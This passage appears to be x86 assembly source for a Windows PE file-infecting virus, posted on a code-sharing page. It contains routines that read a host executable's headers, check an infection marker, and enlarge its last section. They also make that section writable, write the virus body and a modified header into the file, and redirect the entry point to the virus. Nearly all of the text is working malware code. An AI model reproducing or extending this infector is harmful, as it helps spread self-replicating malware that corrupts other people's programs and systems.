📄 one.asm
字号:
lea eax, v_start ;EAX = start of virus.
add eax, ebp ;Plus delta offset.
mov ecx, v_size ;Number of bytes to write.
call WriteMem ;write it.
;Write new object table to host.
mov eax, [ebp+MapBaseAddr] ;EAX -> base of mapped object.
add eax, 3Ch ;Offset of -> to PE header.
mov eax, [eax] ;EAX -> PE header
add eax, [ebp+MapBaseAddr] ;Add base of mapped object.
add eax, 18h ;EAX -> AFTER flags field.
xor edx, edx ;EDX = 0h
mov dx, [ebp+NT_HDR_Size] ;EDX = Size of header.
add edx, eax
lea eax, ObjectTable ;EAX -> new object table.
add eax, ebp ;Add delta offset.
mov ecx, 240d ;Size of new object table.
call WriteMem ;Write it.
;Write new PE header to host.
mov edx, [ebp+MapBaseAddr] ;EDX -> base of mapped object.
add edx, 3Ch ;Offset of -> to PE header.
mov edx, [edx] ;EDX -> PE header
add edx, [ebp+MapBaseAddr] ;Add base of mapped object.
lea eax, PE_Header ;EAX = offset of new PE header.
add eax, ebp ;Plus delta offset.
mov ecx, 54h ;Size of new PE header.
call WriteMem ;Write it.
ret
InfectFile ENDP
;**** WriteMem ****
WriteMem PROC
WM_NextByte:
mov bl, [eax] ;Byte from virus.
mov [edx], bl ;Write to host.
dec ecx ;One less byte to write.
inc eax ;Next virus byte.
inc edx ;Next target byte.
cmp ecx, 0 ;Did we write the whole virus?
jne WM_NextByte ;Nope, do next byte.
ret
WriteMem ENDP
;**** ReadInPEHeader ****
ReadInPEHeader PROC
call SetNOAttribs ;Needed for OpenFile.
jc RIPH_Failed ;Couldnt remove attributes.
call OpenFile ;Open the file.
jc RIPH_Failed ;Couldnt open this file.
;Move file pointer to where the offset to PE should be.
push 0 ;FILE_BEGIN = 00000000h
push 0 ;High order 32 bits to move.
mov eax, 3Ch ;-> offset of PE header.
push eax
push dword ptr [ebp+OpenFileHandle] ;File to fuck with.
call [ebp+lpfSetFilePointer] ;Set the file pointer.
;Read in offset of PE header in file.
push 0
lea eax, [ebp+FileBytesRead] ;Place to store # of bytes read.
push eax
push 4 ;# of bytes to read.
lea eax, [ebp+DataFromFile] ;Buffer for read.
push eax
push dword ptr [ebp+OpenFileHandle] ;File to read from.
call [ebp+lpfReadFile] ;Read from file.
;Move the file pointer to the PE header.
push 0 ;FILE_BEGIN = 00000000h
push 0 ;High order 32 bits of move.
mov eax, [ebp+DataFromFile] ;Offset of PE header.
push eax
push dword ptr [ebp+OpenFileHandle] ;File to fuck with.
call [ebp+lpfSetFilePointer] ;Set the file pointer.
;Read in the PE header.
push 0
lea eax, [ebp+FileBytesRead] ;Place to store # of bytes read.
push eax
push 54h ;# of bytes to read.
lea eax, [ebp+PE_Header] ;Buffer for read.
push eax
push dword ptr [ebp+OpenFileHandle] ;File to read from.
call [ebp+lpfReadFile] ;Read from file.
;Do some checks.
mov eax, [ebp+FileBytesRead] ;# of bytes read.
cmp eax, 54h ;Did we read in enough?
jne RIPH_Failed ;Nope.
mov eax, [ebp+Reserved9] ;EAX = infection marker.
cmp eax, 0h ;Is it infected already?
jne RIPH_Failed ;Yes.
mov ax, word ptr [ebp+Sig_Bytes] ;PE signature.
cmp ax, 'EP' ;Is this a PE file?
jne RIPH_Failed ;Nope.
mov ax, [ebp+NumbOfObjects] ;Number of objects in file.
cmp ax, 6 ;Too many objects?
ja RIPH_Failed ;Yep
;Move file pointer to object table in file.
push 0 ;FILE_BEGIN = 00000000h
push 0 ;High order 32 bits of move.
xor eax, eax
mov ax, [ebp+NT_HDR_Size] ;NT header size.
add eax, [ebp+DataFromFile] ;Plus offset to PE header.
add eax, 18h ;AFTER flags field in header.
push eax
push dword ptr [ebp+OpenFileHandle] ;File to fuck with.
call [ebp+lpfSetFilePointer] ;Set the file pointer.
;Read in object table.
push 0
lea eax, [ebp+FileBytesRead] ;Place to store # of bytes read.
push eax
push 240d ;# of bytes to read.
lea eax, [ebp+ObjectTable] ;Buffer for read.
push eax
push dword ptr [ebp+OpenFileHandle] ;File to read from.
call [ebp+lpfReadFile] ;Read from file.
;Do some checks.
mov eax, [ebp+FileBytesRead] ;# of bytes read.
cmp eax, 240d ;Did we read enough?
jne RIPH_Failed ;Nope.
;Save Original entry point.
mov eax, [ebp+ImageBase] ;Files base address
add eax, [ebp+EntryPointRVA] ;Plus entrypoint RVA.
mov [ebp+OldEA], eax ;Save it.
;** Figure out sizes for object and size of file **
;Get offset to DATA of the object we will infect.
xor eax, eax
mov ax, [ebp+NumbOfObjects] ;Number of objects.
dec eax ;We want last object.
mov ecx, 40 ;Each object 40 bytes
xor edx, edx
mul ecx ;#OfObj-1*40=last object.
lea esi, [ebp+ObjectTable] ;ESI -> object table.
add esi, eax ;ESI = ptr to last Object Entry.
;Set new physical size for object.
mov ecx, dword ptr [ebp+FileAlign] ;Get file alignment.
mov eax, [esi+16d] ;Get physical size of object.
mov [ebp+OldPhysSize], eax ;Save it.
push eax ;Save for figuring new entry point.
add eax, v_size ;Size of virus.
call AlignFix ;Figure new size.
mov dword ptr [esi+16d], eax ;Set new physical size.
;Set new virtual size for object.
mov ecx, dword ptr [ebp+ObjectAlign] ;Get object alignment.
push ecx ;Save for below.
mov eax, [esi+8] ;Get object virtual size.
add eax, v_size ;Add our virtual size.
call AlignFix ;Set on obj alignment.
mov dword ptr [esi+8], eax ;Set new virtual size.
mov [esi+36d], 0C0000040h ; set object flags
;Set new image size.
pop ecx ;ECX = object alignment vlaue.
mov eax, v_size ;EAX = size of virus.
add eax, dword ptr [ebp+ImageSize] ;add to old image size
call AlignFix ;Figure new size.
mov [ebp+ImageSize], eax ;Set new ImageSize.
;Set new entrypoint.
pop eax ;EAX = physical size of infected object.
add eax, [esi+12d] ;Add objects RVA.
mov [ebp+EntryPointRVA], eax ;Set new entrypoint.
;** Figure new physical size for mapping. **
;Get files size.
push 0
push dword ptr [ebp+OpenFileHandle] ;Handle of file.
call [ebp+lpfGetFileSize] ;Get the files size in bytes.
mov [ebp+SizeOfHost], eax ;Save size.
mov [ebp+Reserved9], eax ;Mark as infected.
;Figure new size.
mov ebx, [esi+16d] ;Object physical size.
add ebx, [esi+20d] ;Add physical offset of object.
cmp ebx, eax ;Which is larger?
ja RIPH_NewSize ;File size should be larger.
jmp RIPH_Done ;Return success.
RIPH_NewSize:
mov ecx, [ebp+FileAlign] ;File align value
mov eax, ebx ;Size now.
call AlignFix ;Figure new size.
mov [ebp+SizeOfHost], eax ;Save new size.
jmp RIPH_Done
RIPH_Failed:
xor ebx, ebx ;Mark failure.
RIPH_Done:
call CloseFile ;Close the file.
call RestoreAttribs ;Restore its attributes.
ret
ReadInPEHeader ENDP
;**** SetNOAttribs ****
;This function first saves a files attributes to OrigFileAttribs,
;then sets the files attributes to "normal" so that the file can
;be written to. On errors, the carry flag is set.
SetNOAttribs PROC
;Get the files attributes.
lea eax, [ebp+FoundFileData.WFD_szFileName]
push eax ;Push found files name.
call [ebp+lpfGetFileAttributesA]
mov [ebp+OrigFileAttribs], eax ;Save original file attribs.
;Set file attributes to none so we can write to it if needed.
mov eax, FILE_ATTRIBUTE_NORMAL ;Give the file "normal" attribs
push eax
lea eax, [ebp+FoundFileData.WFD_szFileName]
push eax ;Push files name to stack.
call [ebp+lpfSetFileAttributesA] ;Set the attributes.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -